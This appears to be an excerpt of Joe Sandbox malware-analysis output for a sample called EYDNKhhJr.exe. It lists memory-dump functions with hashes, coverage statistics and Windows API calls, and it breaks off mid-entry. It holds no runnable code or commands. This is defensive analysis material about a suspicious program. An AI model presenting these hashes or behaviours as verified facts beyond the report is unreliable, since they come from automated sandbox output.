Opcode ID: f306f95430364fc498377424a2e74253e7b91a3ccf1f727f8140e035c34ea119
Instruction ID: 52e382dd277f7b0d7578766b3232af94150c58a04ecf6bdc919c00250789e00c
Opcode Fuzzy Hash: f306f95430364fc498377424a2e74253e7b91a3ccf1f727f8140e035c34ea119
Instruction Fuzzy Hash: 1321F4B5900249DFDB10DF9AC584BDEFBF4FB48310F10842AE858A7650D378A644CFA5

Function 02ACB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ACB09E

Memory Dump Source

Source File: 0000000C.00000002.2212365859.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ac0000_EYDNKhhJr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fe6df61976bae781b11b18cae66feda6c1a058dd6d72a451b0206d9d051e5324
Instruction ID: e97103109943ef87fe30167d373c99ab627a39384cf6fb33009ed56ed6566d5d
Opcode Fuzzy Hash: fe6df61976bae781b11b18cae66feda6c1a058dd6d72a451b0206d9d051e5324
Instruction Fuzzy Hash: EA1113B5C00749CFDB10CF9AC444BDEFBF4AB88328F10841AD428A7600D376A545CFA1

Function 00F7D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2209196543.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f7d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5703cb024f3f27d08efad5c1584d0936f1075070c5cf2fbf209a90b3965a8b89
Instruction ID: b8bf54afacf10b10f2094a3eb55e480d55b09e34a569a72cfa896c1c30cff231
Opcode Fuzzy Hash: 5703cb024f3f27d08efad5c1584d0936f1075070c5cf2fbf209a90b3965a8b89
Instruction Fuzzy Hash: 1621F172500204EFDB04DF14D9C0B26BB75FF98324F60C16AE90D0B256C336E856EAA2

Function 00F7D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2209196543.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f7d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f607160fef84d52b82b86aa19d2141bfe00ad4f0bea201734e834f0f028be90
Instruction ID: 08fb24c5cd944f54e639e5a1bf0f589b343d335b373d86321cc41343f46bd209
Opcode Fuzzy Hash: 1f607160fef84d52b82b86aa19d2141bfe00ad4f0bea201734e834f0f028be90
Instruction Fuzzy Hash: 4C210672900244EFDB05DF14D9C0B26BF75FF88328F68C56AD9090B256C336D856DAA2

Function 0141D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2211972929.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_141d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d972ee9d8ad9690f9ebfdfa87991ca5fa3df2e67a81e78ca887865d65b91371
Instruction ID: 3ab6a5ff9e9c66a1a99c074894b194aafb021ffb10847d3ebcd7c4f39bd0e190
Opcode Fuzzy Hash: 5d972ee9d8ad9690f9ebfdfa87991ca5fa3df2e67a81e78ca887865d65b91371
Instruction Fuzzy Hash: 2E2129B1A04304EFDB05DF94D9C4B66BBA5FB84324F20C66ED9094B36AC336D446CA61

Function 0141D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2211972929.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_141d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9dafc30a9f3387c9ef904d676fbb954240da8bf504ccc8e68a1b34d72cbdee
Instruction ID: 8f471a5b75410e52ab232d73cc1ba191de8643fd57b3209c3280a91b59019edc
Opcode Fuzzy Hash: 3d9dafc30a9f3387c9ef904d676fbb954240da8bf504ccc8e68a1b34d72cbdee
Instruction Fuzzy Hash: 9021D3F5A04204EFDB15DF68D988B16BF65EB84318F20C56ED90A4B36AC33AD447CA61

Function 0141D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2211972929.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_141d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 258c5fd4b89ceb5908b04d3f3fa244fee971395f755411b0335f70e8a563fa0a
Instruction ID: 9f17802f48651ae2bc3fd5de5610e073e9da6c45e97d96fd7455818ca1272a20
Opcode Fuzzy Hash: 258c5fd4b89ceb5908b04d3f3fa244fee971395f755411b0335f70e8a563fa0a
Instruction Fuzzy Hash: C52180B55093809FDB06CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62

Function 00F7D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2209196543.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f7d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 9b85f2f7690e04986e88fdbd53576ffe154d635ab3dbe4ae982e5b3c127981b3
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 8211E976904240DFCB15CF10D5C4B16BF71FF94324F28C6AAD8490B656C336D456DB92

Function 00F7D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2209196543.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_f7d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: b90d769db36b61b3556110fdadfc2f1330383a2d9043849b640051fbacba9636
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 7811D376904240DFCB15CF10D5C4B16BF71FF94324F24C6AAD8090B656C33AE85ADBA2

Function 0141D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2211972929.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_141d000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: dca956718c90d4ab5901ce93faed696ed742624dfa0ff56535d9fdb42265898d
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: B011BEB5904280DFCB02CF54C5C4B16FFA1FB84224F24C6AAD8494B766C33AD40ACB51

Analysis Process: EYDNKhhJr.exePID: 3704, Parent PID: 4176COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	164
Total number of Limit Nodes:	14

Executed Functions

Function 05F69578 Relevance: 1.9, APIs: 1, Instructions: 359
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3402514066.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5f60000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df3e76189a89a978013b696a906755c2192ee8cb739451cea41b185c5a199be
Instruction ID: 80f03cc8f766cf123a0974f102b7a575eb784e3324295c809fae78bb3996693a
Opcode Fuzzy Hash: 1df3e76189a89a978013b696a906755c2192ee8cb739451cea41b185c5a199be
Instruction Fuzzy Hash: BCF1F474E01218CFDB24DFA9C984B9DBBB2FF88300F1481A9D848AB355DB749986CF50

Function 030DA598 Relevance: .9, Instructions: 894COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51eb7697acb62ddc2db7ac26f00449a44fd3f4114143724ec7423e7a4e91c60d
Instruction ID: 1ee5455a1ea06ac53b19a4235f67aed7528f0142a5591552581dba8295b564c6
Opcode Fuzzy Hash: 51eb7697acb62ddc2db7ac26f00449a44fd3f4114143724ec7423e7a4e91c60d
Instruction Fuzzy Hash: 0F827E75B01209DFCB15CFA8C984AAEBBF6FF88310F158595E8059B365D734E981CBA0

Function 030D6EA8 Relevance: .5, Instructions: 523COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601ee21d92fc24d597fb470cb5c123fe06e792ea3e9e899a82ae66636d24ac9d
Instruction ID: fb666a6429ab9007c7681f50d921f1cd8aaa85b99dac139d29ddec47a0121748
Opcode Fuzzy Hash: 601ee21d92fc24d597fb470cb5c123fe06e792ea3e9e899a82ae66636d24ac9d
Instruction Fuzzy Hash: 85127E71A012198FDB18DFA9C854BAEBBF6FF88700F148569E805DB395EB349D41CB90

Function 030D74E0 Relevance: .5, Instructions: 454
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288608685681c223c1387d6adc2a65074d1fa3f991a6cb313fcb0ab15cc2eec9
Instruction ID: 612c05be865c522b5cd9c5dd8e599e6d4c8137c3e432921db6571b5e6cc8dae0
Opcode Fuzzy Hash: 288608685681c223c1387d6adc2a65074d1fa3f991a6cb313fcb0ab15cc2eec9
Instruction Fuzzy Hash: F6027F31A01219DFDB54CFA9C884AAEFBF6FF88700F1984A9E406AB265D730D941CF51

Function 030DC4E0 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f74620ee2076bb2d20d9af802e1fd10d0d1a4be5884bcc0baf6be39856701c
Instruction ID: 3cd016459b9ac83e560b23f2d636589bb2dc06acdd18596eb14c14993ac4f824
Opcode Fuzzy Hash: 23f74620ee2076bb2d20d9af802e1fd10d0d1a4be5884bcc0baf6be39856701c
Instruction Fuzzy Hash: 4DE1EC75E01318DFEB54DFA9C884A9DBBF2BF49310F1980A9E819AB365DB309841CF51

Function 030DD20B Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e6a0f113908916d3a918466efa959ddfebc68e521ad8555ed3e193a933470ae
Instruction ID: 5cdf21e72b21b3cdddaa330c978c85492808b40267caf207d6262ae824fa20e1
Opcode Fuzzy Hash: 9e6a0f113908916d3a918466efa959ddfebc68e521ad8555ed3e193a933470ae
Instruction Fuzzy Hash: F991D274E01218DFDB54DFAAD884A9DBBF2FF89300F1481A9D819AB365DB349942CF50

Function 030DD7B8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaeb5c5ddf9d30dbba1693f779ecf047143c7b818b9a85d691a7757bc0a7b663
Instruction ID: be74652b67d4247c960e6eb87851532a4b15f83cff3cbc5c96e4e08f04e1cf7c
Opcode Fuzzy Hash: eaeb5c5ddf9d30dbba1693f779ecf047143c7b818b9a85d691a7757bc0a7b663
Instruction Fuzzy Hash: 5F91D274E01218CFDB54DFAAD984A9DFBF2BF89304F1480A9D809AB365DB319946CF50

Function 030D586F Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9fe1bd67db27d3f17540f371178058287eb878f192189bcc44203e2cd46e4f1
Instruction ID: 838de429578e492e8bede055c597a6fbdb0f2150246153857c1cbb605854ea28
Opcode Fuzzy Hash: a9fe1bd67db27d3f17540f371178058287eb878f192189bcc44203e2cd46e4f1
Instruction Fuzzy Hash: B391C374E01218DFDB54DFAAD894A9DBBF2FF89300F1480AAD809AB365DB349945CF50

Function 030DC980 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10e660844a56e59933aebb169963162d3efa0caf5dc1c36f5e174a2bd242683
Instruction ID: 2769ecf4f6d007e8c3b7dd9d403043f1a7255f449d7c358c62312287e49d1809
Opcode Fuzzy Hash: e10e660844a56e59933aebb169963162d3efa0caf5dc1c36f5e174a2bd242683
Instruction Fuzzy Hash: A281B074E01218CFEB54DFAAD884A9DBBF2FF89314F148069E809AB365DB349941CF50

Function 030DCC58 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75dbea3e3acb6226da661bfc832f3b878fcff4b98b64a41cfe34a141c3415f3e
Instruction ID: 7b1f6011a007a22ea90b06b2db480fe6890394e1380bda7d959b22112c68b035
Opcode Fuzzy Hash: 75dbea3e3acb6226da661bfc832f3b878fcff4b98b64a41cfe34a141c3415f3e
Instruction Fuzzy Hash: 75819174E01218CFEB54DFAAD994A9DBBF2BF89300F14C06AE819AB365DB345941CF50

Function 030DCF30 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 816282ff7ceeef9ca990643f637f8e4c9e3f8012a4930f26fae20565fb310d8f
Instruction ID: f849c7f0de03dda3eaa5cc372c295fb40fef9b44071380123fc05349277618c6
Opcode Fuzzy Hash: 816282ff7ceeef9ca990643f637f8e4c9e3f8012a4930f26fae20565fb310d8f
Instruction Fuzzy Hash: 0781A274E01218DFEB54DFAAD884A9DBBF2FF89300F148069D819AB365DB349946CF50

Function 030DD4EB Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3e01f00558d164d928463b6f7eccd4ca7dc9a0b894576067a7d74a0588e945c
Instruction ID: 9469825dd3b38bed28b595c682640c042ef65edf7d205f3799648339dc028eb8
Opcode Fuzzy Hash: f3e01f00558d164d928463b6f7eccd4ca7dc9a0b894576067a7d74a0588e945c
Instruction Fuzzy Hash: 54819174E01218CFDB58DFAAD894A9DBBF2BF89300F14C069E819AB365DB349941CF50

Function 030DC6A8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d39f4d9ed558d9b8fd55c1f5ff8f1538923e0710342758aa8ae7b6b6ae44d81c
Instruction ID: 5f7f33c88457337fe212210b9a8b7f851162f18dfc1112b6cadd64a2ee7b652e
Opcode Fuzzy Hash: d39f4d9ed558d9b8fd55c1f5ff8f1538923e0710342758aa8ae7b6b6ae44d81c
Instruction Fuzzy Hash: 7261A174E013089FEB58DFAAD984A9DBBF2BF89300F149069D819AB365DB345845CF50

Function 030DEED0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c54be4080f5672e06ce927c83fa29385a86e6373816df1855b98fbeafc7f178
Instruction ID: ae0f2891623b40fb6b1343f605201c58cb2bbe90390eddbba2b5189f223d27ea
Opcode Fuzzy Hash: 0c54be4080f5672e06ce927c83fa29385a86e6373816df1855b98fbeafc7f178
Instruction Fuzzy Hash: 45518674E01208DFEB18DFAAD494A9DBBF2BF89300F24D129E815AB365DB315941CF54

Function 030DEEE0 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21d37e9dc2b580ef91a17e624563d4f6a9df89fbe441160d5027117700ff58c
Instruction ID: 4c8b10ab27a27b3a6decf32cc446273e4fa60db6de8d7fa4049df0bf6751eb18
Opcode Fuzzy Hash: a21d37e9dc2b580ef91a17e624563d4f6a9df89fbe441160d5027117700ff58c
Instruction Fuzzy Hash: 3B517274E01308DFEB18DFAAD594A9DBBF2AF89300F249029E819AB365DB315941CF54

Function 07364708 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3406103398.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7360000_EYDNKhhJr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cf4ba950316773db103beafc35b79ef2b57b5c0cd182eb6f0e3c6d1277788b8e
Instruction ID: 20090266c4116dbbc3a0aea9be3f73f5eede0f32541ba4620f87c3cf40446596
Opcode Fuzzy Hash: cf4ba950316773db103beafc35b79ef2b57b5c0cd182eb6f0e3c6d1277788b8e
Instruction Fuzzy Hash: 107135B0A00B458FE724DF29D15879ABBF1FF89300F008A2DD09ADBA44D735E949CB91

Function 07366CE4 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 07366E02

Memory Dump Source

Source File: 0000000F.00000002.3406103398.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7360000_EYDNKhhJr.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c74ccd5e2078ebc84c9022f036bfdfafd03fd596e600219a5b5dda56420c7ad2
Instruction ID: f3e67b0aef7ca088b02137310d0745b2153a61bdbeb0f8e02969a51d2c88cff1
Opcode Fuzzy Hash: c74ccd5e2078ebc84c9022f036bfdfafd03fd596e600219a5b5dda56420c7ad2
Instruction Fuzzy Hash: 5751C1B5D00349EFDB14CFA9C984ADEBBF5BF88350F24812AE818AB214D7759845CF90

Function 07365ABC Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 07366E02

Memory Dump Source

Source File: 0000000F.00000002.3406103398.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7360000_EYDNKhhJr.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4bc893e1383cce9f8cecdffb0bde308c1fcbd24021c06d6af4b1b11306b136a2
Instruction ID: 1af675e8328bfa60f4af637ccf138e74388890bfba8945f9fa16fe57b1e068fc
Opcode Fuzzy Hash: 4bc893e1383cce9f8cecdffb0bde308c1fcbd24021c06d6af4b1b11306b136a2
Instruction Fuzzy Hash: C551C0B5D00349DFEB14CF99C985ADEBBB5BF48350F24812AE818AB214D7759845CF90

Function 07365C0C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 07369371

Memory Dump Source

Source File: 0000000F.00000002.3406103398.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7360000_EYDNKhhJr.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 90b685158fa278eba78c0fcda7223807dfad0945ed9992a0e77de0d59fc2562f
Instruction ID: 9f32a7defa58e9ccc91c27fe30940cb4b61bff98f900e5b1f1ce5267d5c3b33d
Opcode Fuzzy Hash: 90b685158fa278eba78c0fcda7223807dfad0945ed9992a0e77de0d59fc2562f
Instruction Fuzzy Hash: 964147B8900249DFEB14CF99C488BAABBF5FB88314F24C45DD519AB365D335A840CBA0

Function 05F6995F Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05F69AA1

Memory Dump Source

Source File: 0000000F.00000002.3402514066.0000000005F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_5f60000_EYDNKhhJr.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 330ef995b0477853c3ca631953bc57acb63d4ddf544c6fcc8028c494c41ae082
Instruction ID: 5e2998f5248ef35eeeb17af7c6a7adb4bc0a14ceaf8e7dfec46b4f402b14b655
Opcode Fuzzy Hash: 330ef995b0477853c3ca631953bc57acb63d4ddf544c6fcc8028c494c41ae082
Instruction Fuzzy Hash: BB114C78E002198FDB14DBA8DA84EFDBBF5FF88315F148165E848E7246DB749941CB60

Function 07363680 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,07364724), ref: 0736495E

Memory Dump Source

Source File: 0000000F.00000002.3406103398.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7360000_EYDNKhhJr.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: dfb70b1e77a7cb8ffc54b24160d0dcd6e4c61c921855dde3a00427112330e4f3
Instruction ID: a7d179dd3c4045176425e83eb14a042d27c744cfc879830efc49c174429d8a0a
Opcode Fuzzy Hash: dfb70b1e77a7cb8ffc54b24160d0dcd6e4c61c921855dde3a00427112330e4f3
Instruction Fuzzy Hash: D61120B5C00789CBEB10CF9AD448A9EFBF4EB88610F10842AD418A7200D374AA04CFA1

Function 030D89A8 Relevance: .7, Instructions: 693
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8952e9c699e526251c132f2f9239c1b534983a8452fcb0117f905a2fbd6fb3
Instruction ID: fa9a00689aa885f54b80c7e95510036a04be2be78c7f1dd37bd4033b142996d2
Opcode Fuzzy Hash: 5f8952e9c699e526251c132f2f9239c1b534983a8452fcb0117f905a2fbd6fb3
Instruction Fuzzy Hash: 20520F34A0121CCFFB64DBA4C860B9EBBB6EF89300F1081A9D10A6B795DB355D46DF61

Function 030DE55B Relevance: .7, Instructions: 652
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e3473cfb294653d5c6db12da11848d3a8c006e6f71505e043e15d947264b883
Instruction ID: 84c5a4a2ec2149d008e0c4e0742d8d1ebeb9f9d15e29cf09e3caad7035822f3d
Opcode Fuzzy Hash: 2e3473cfb294653d5c6db12da11848d3a8c006e6f71505e043e15d947264b883
Instruction Fuzzy Hash: AA1298794722639F97803B75A6AE16EBEB0FF4F3A7701AD44F11EC04049F71058ACAA1

Function 030DE568 Relevance: .6, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2b6fe6ac93079502af8aad1b42e7374c06d7151f29e6f7a6e84127a5ccb402
Instruction ID: d8535264f1748efbc3ff1e192feef81289dda1a321933713293a5018292e9724
Opcode Fuzzy Hash: 8b2b6fe6ac93079502af8aad1b42e7374c06d7151f29e6f7a6e84127a5ccb402
Instruction Fuzzy Hash: CC1288795712679F97843B75A2AE16EBEB0FF4F3A7701AD04F11EC08049F71058ACAA1

Function 030D1190 Relevance: .5, Instructions: 549
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52801e96b37533ffa19cccc107997b2268a833a38d11cc0ad94abd296e0bc488
Instruction ID: 71a9e27361cc6934be353f868a73d6f8467835f087d607b7998eb9f013879624
Opcode Fuzzy Hash: 52801e96b37533ffa19cccc107997b2268a833a38d11cc0ad94abd296e0bc488
Instruction Fuzzy Hash: 36521934D40219CFCB58EF64E994AADBBB6FB8D300F0091A9D50AA7355DB345E91CF90

Function 030D11A0 Relevance: .5, Instructions: 543
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.3389943011.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30d0000_EYDNKhhJr.jbxd

Similarity

API ID:
String ID:
